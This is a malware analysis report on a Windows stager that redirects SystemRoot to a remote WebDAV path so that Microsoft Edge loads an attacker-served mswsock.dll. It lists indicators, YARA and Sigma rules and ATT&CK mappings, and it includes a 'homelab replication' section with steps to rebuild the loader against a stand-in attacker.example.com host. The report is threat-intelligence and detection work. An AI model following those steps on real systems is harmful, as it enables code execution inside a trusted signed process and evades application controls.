typeanalysisfamilyunattributedconfidencemediumcreated2026-08-09updated2026-08-09pemsvcevasionc2-protocoldefense-evasionmitre-attck
SHA-256: f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283

unattributed: f8ab87be57e4 — MSVC 14.43 SystemRoot-poison Edge DLL-hijack loader

Executive Summary

A freshly compiled (May 26 2026) MSVC 14.43 x64 console PE that hijacks Microsoft Edge’s DLL search order by poisoning SystemRoot to point to an attacker-controlled AWS API Gateway endpoint. Edge is then launched with a decoy PDF URL; when it initializes Winsock, it loads mswsock.dll from the poisoned %SystemRoot%\system32\ path. The result is a signed Microsoft process executing attacker-supplied code over HTTPS/WebDAV without ever touching disk with a malicious DLL. French-language logging strings suggest a francophone actor or target set. Static-only analysis; no CAPE detonation available.

What It Is

  • SHA-256: f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283
  • Size: 140 288 bytes (140 KB)
  • Format: PE32+ executable (console) x86-64, 5 sections ^[file.txt]
  • Compiler: MSVC 14.43 (Visual Studio 2022) — LinkerVersion 14.43, IMAGE_DEBUG_TYPE_POGO present ^[exiftool.json] ^[pefile.txt]
  • Compiled: Tue May 26 21:02:23 2026 UTC ^[pefile.txt]
  • Packed / obfuscated: No. No packing detected; standard MSVC CRT startup. Entropy 6.50 on .text, 4.96 on .rdata. ^[pefile.txt]
  • Signed: No. Checksum 0x0, no security directory. ^[pefile.txt]
  • Anti-analysis: None observed. Only IsDebuggerPresent imported via CRT (not called explicitly in main). No VM checks, no timing gates. ^[pefile.txt]
  • YARA: Generic PE_File_Generic only. ^[yara.txt]
  • CAPE: Skipped — no Windows guest available. ^[dynamic-analysis.md]

How It Works

The binary performs a four-stage setup:

  1. Environment poisoning — Calls SetEnvironmentVariableW four times to overwrite SystemRoot, SYSTEMROOT, windir, and WINDIR with the same attacker-controlled UNC path: \\mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com@SSL@443\cv ^[r2:main]
  2. Validation — Retrieves the real SystemRoot via GetEnvironmentVariableW and prints it to console (likely a debug artefact). Also expands %SystemRoot%\system32\mswsock.dll via ExpandEnvironmentStringsW to confirm the poisoned path resolves correctly. ^[r2:main]
  3. Edge discovery — Checks GetFileAttributesW on the two standard Edge install paths (C:\Program Files (x86)\…\msedge.exe and C:\Program Files\…\msedge.exe). Exits with French error message if absent. ^[r2:main]
  4. Edge launch — Creates %TEMP%\edge_sideload as the user-data directory, builds a command line with --no-first-run --no-default-browser-check --user-data-dir="%TEMP%\edge_sideload" --new-window https://pdfobject.com/pdf/sample.pdf, and spawns Edge via CreateProcessW. ^[r2:main]

When Edge starts and initializes its network stack, the Winsock loader searches for mswsock.dll using the standard DLL search order. Because %SystemRoot% now resolves to the attacker’s AWS API Gateway, the search hits %SystemRoot%\system32\mswsock.dll — which the attacker can serve as a malicious DLL. Edge, a signed Microsoft binary, loads and executes it in-process. This is a living-off-the-land DLL search-order hijack where the only malicious file touching disk is the 140 KB stager itself.

The decoy URL (pdfobject.com/pdf/sample.pdf) is a benign PDF hosting service, giving the victim the appearance of a normal document viewer launching.

Decompiled Behavior

Radare2 analysis recovered 527 functions. The relevant ones:

  • entry0 @ 0x140001720 — Standard MSVC CRT startup (__scrt_common_main_seh), performs cookie/CFG init, then calls main. ^[r2:entry0]
  • main @ 0x140001070 — The entire threat logic lives here. No sub-functions for the payload chain; it is flat and linear.
    • Lines 0x140001070–0x1400010c0: stack cookie setup, then four SetEnvironmentVariableW calls poisoning SystemRoot/SYSTEMROOT/windir/WINDIR.
    • Lines 0x1400010d0–0x140001130: GetEnvironmentVariableW("SystemRoot", …) and ExpandEnvironmentStringsW("%SystemRoot%\system32\mswsock.dll", …).
    • Lines 0x140001140–0x1400011b0: GetFileAttributesW loop over the two Edge paths.
    • Lines 0x1400011c0–0x1400012e0: ExpandEnvironmentStringsW for %TEMP%\edge_sideload, string format the command line, CreateProcessW.
    • Lines 0x1400012f0–0x140001330: CloseHandle on process/thread handles, French-language success/failure prints. ^[r2:main]
  • fcn.140001360 — A thin printf wrapper (calls __stdio_common_vfprintf via KERNEL32.dll_WriteConsoleW). ^[r2:fcn.140001360]

Control-flow pattern: Entirely linear. No conditional branching except the Edge-existence check. No encryption, no string obfuscation, no dynamic API resolution. The binary is a straightforward “set env vars, launch Edge” launcher.

C2 Infrastructure

Indicator Value Type
AWS API Gateway mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com UNC/WebDAV staging server
Port 443 (HTTPS) Used via @SSL@443 UNC syntax
Decoy URL https://pdfobject.com/pdf/sample.pdf Benign PDF to mask intent
Temp directory %TEMP%\edge_sideload Edge profile staging
Target DLL mswsock.dll Winsock service provider hijacked via search order

The @SSL@443 syntax in a UNC path tells Windows to negotiate an encrypted WebDAV/SMB-over-HTTPS tunnel to the endpoint. This means the malicious mswsock.dll payload is fetched over TLS, reducing network detection surface. ^[r2:main]

Interesting Tidbits

  • French-language logging. All user-facing strings are in French: “msedge.exe introuvable sur le poste”, “Lancement”, “Edge lance (PID=%lu)”. This suggests either a francophone actor or a campaign targeting French-speaking victims. ^[strings.txt:1]
  • Debug build artefacts. The binary contains IMAGE_DEBUG_TYPE_POGO (Profile-Guided Optimization) debug info and full CRT unwind data. It was not stripped. ^[pefile.txt]
  • Standard section names, standard linker. No tricks in the PE layout — .text, .rdata, .data, .pdata, .reloc all with normal characteristics. The only anomaly is the complete absence of .rsrc (no icons, no version info, no manifest). ^[pefile.txt]
  • No network imports in the stager. The stager itself imports only KERNEL32.dll. All network activity is delegated to Edge and the Windows DLL loader, making the binary itself appear harmless to static network-import heuristics. ^[pefile.txt]
  • AWS API Gateway as C2. Using a serverless API Gateway endpoint (eu-west-3 / Paris region) provides the actor with automatic TLS, no persistent server infrastructure, and easy rotation. The /cv suffix in the UNC path may be a campaign identifier.
  • May 2026 build date. Less than three months old at time of analysis — actively maintained tooling or a very recent campaign.

How To Mess With It (Homelab Replication)

Goal: Reproduce a SystemRoot-poison DLL-hijack loader that causes a signed binary to load a remote DLL.

Toolchain: Visual Studio 2022 (v17.x), C++, x64 Release with PGO (optional).

Steps:

  1. Create a new C++ Console project in VS 2022.
  2. Use SetEnvironmentVariableW(L"SystemRoot", L"\\\\attacker.example.com@SSL@443\\share") before spawning the target process.
  3. Build command-line arguments for msedge.exe with --user-data-dir pointing to a temp folder.
  4. Call CreateProcessW to launch Edge.
  5. Host a test mswsock.dll (any compiled DLL with DllMain that logs or pops calc) on a WebDAV/HTTPS server at /cv/system32/mswsock.dll.
  6. Verify: Edge starts, and ProcMon shows it attempting to load mswsock.dll from \attacker.example.com@SSL@443\cv\system32\mswsock.dll.

What you learn: This demonstrates how trivial environment-variable manipulation can subvert DLL search order in a signed Microsoft process, bypassing many application-control policies that trust Edge.

Deployable Signatures

YARA rule

rule Unclassified_MSVC_SystemRoot_Poison_Edge_Loader
{
    meta:
        description = "MSVC x64 console PE that poisons SystemRoot to hijack Edge DLL loading"
        author = "PacketPursuit"
        date = "2026-08-09"
        sha256 = "f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283"
    strings:
        $api1 = "SetEnvironmentVariableW" wide ascii
        $api2 = "GetEnvironmentVariableW" wide ascii
        $api3 = "ExpandEnvironmentStringsW" wide ascii
        $api4 = "CreateProcessW" wide ascii
        $edge1 = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" wide
        $edge2 = "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" wide
        $sys1 = "SystemRoot" wide
        $sys2 = "SYSTEMROOT" wide
        $sys3 = "windir" wide
        $sys4 = "WINDIR" wide
        $decoy = "https://pdfobject.com/pdf/sample.pdf" wide
        $cmd = "--no-first-run --no-default-browser-check --user-data-dir=" wide
    condition:
        uint16(0) == 0x5A4D and
        uint32(uint32(0x3C)) == 0x4550 and
        uint16(uint32(0x3C)+0x18) == 0x20B and
        $api1 and $api2 and $api3 and $api4 and
        ($edge1 or $edge2) and
        ($sys1 or $sys2 or $sys3 or $sys4) and
        ($decoy or $cmd)
}

Sigma rule

title: SystemRoot Poison Edge Launcher
logsource:
    category: process_creation
    product: windows
detection:
    selection_env:
        CommandLine|contains:
            - 'SetEnvironmentVariableW'
    selection_edge:
        CommandLine|contains:
            - 'msedge.exe'
            - '--user-data-dir'
            - '--no-first-run'
    selection_unc:
        CommandLine|contains:
            - 'execute-api'
            - '@SSL@'
    condition: selection_edge and selection_unc
falsepositives:
    - Unlikely in legitimate software
level: high

IOC list

Type Value
SHA-256 f8ab87be57e458dc4ec8fb32cccda614acc08f3e197d033cc79032b244025283
SSDeep 1536:61hbuy/2oUe3kliCgSbwd+8QhL99yyvhySbQeHcr+CUisCqtUlbmFNo1GtksWrC8:s1nDAL/T1bQe8rXsMlbmHWuwommTQK
TLSH 44D37C1BB3E531F8E5778238C4514A46E7B3B87147219B6F03E446A62F636D09E3EB21
AWS API Gateway mlyhbaa1h6.execute-api.eu-west-3.amazonaws.com
Decoy URL https://pdfobject.com/pdf/sample.pdf
Env vars poisoned SystemRoot, SYSTEMROOT, windir, WINDIR
Temp dir created %TEMP%\edge_sideload
French strings msedge.exe introuvable sur le poste, Lancement, Edge lance
Target DLL mswsock.dll (loaded from poisoned %SystemRoot%\system32\)

Behavioral fingerprint statement

This binary is a 140 KB MSVC 14.43 x64 console executable with no exports, no .rsrc section, and only KERNEL32.dll imports. On launch it overwrites the four standard Windows root-directory environment variables (SystemRoot, SYSTEMROOT, windir, WINDIR) with an attacker-controlled UNC path pointing to an AWS API Gateway endpoint. It then verifies the presence of msedge.exe in either Program Files location, expands %TEMP%\edge_sideload, and spawns Edge with --no-first-run --no-default-browser-check --user-data-dir and a decoy PDF URL. The intent is to force Edge — a signed Microsoft binary — to load mswsock.dll from the poisoned UNC path when it initializes Winsock, executing attacker-controlled code inside a trusted process context.

Detection Signatures

No capa output available (signature path error). Manual ATT&CK mapping based on decompiled behavior:

ATT&CK ID Technique Evidence
T1574.001 DLL Search Order Hijacking Poisoning SystemRoot to redirect mswsock.dll load ^[r2:main]
T1059 Command and Scripting Interpreter Spawns Edge with crafted command-line args ^[r2:main]
T1204.002 User Execution: Malicious File Victim executes the stager PE ^[file.txt]
T1071.001 Application Layer Protocol: Web Protocols AWS API Gateway over HTTPS/WebDAV for DLL staging ^[r2:main]
T1105 Ingress Tool Transfer Remote mswsock.dll fetched over UNC/WebDAV at runtime ^[r2:main]

References

Provenance

  • file.txt — file(1) output
  • exiftool.json — ExifTool 12.76 PE metadata
  • pefile.txt — pefile.py full PE dump
  • strings.txt — GNU strings output
  • rabin2-info.txt / radare2 decompilation — radare2 5.x analysis (main, entry0, fcn.140001360)
  • binwalk.txt — Binwalk 2.3.4 (no embedded archives)
  • capa.txt — capa failed (missing signatures)
  • floss.txt — floss failed (argument parsing error)
  • dynamic-analysis.md — CAPE skipped (no Windows guest)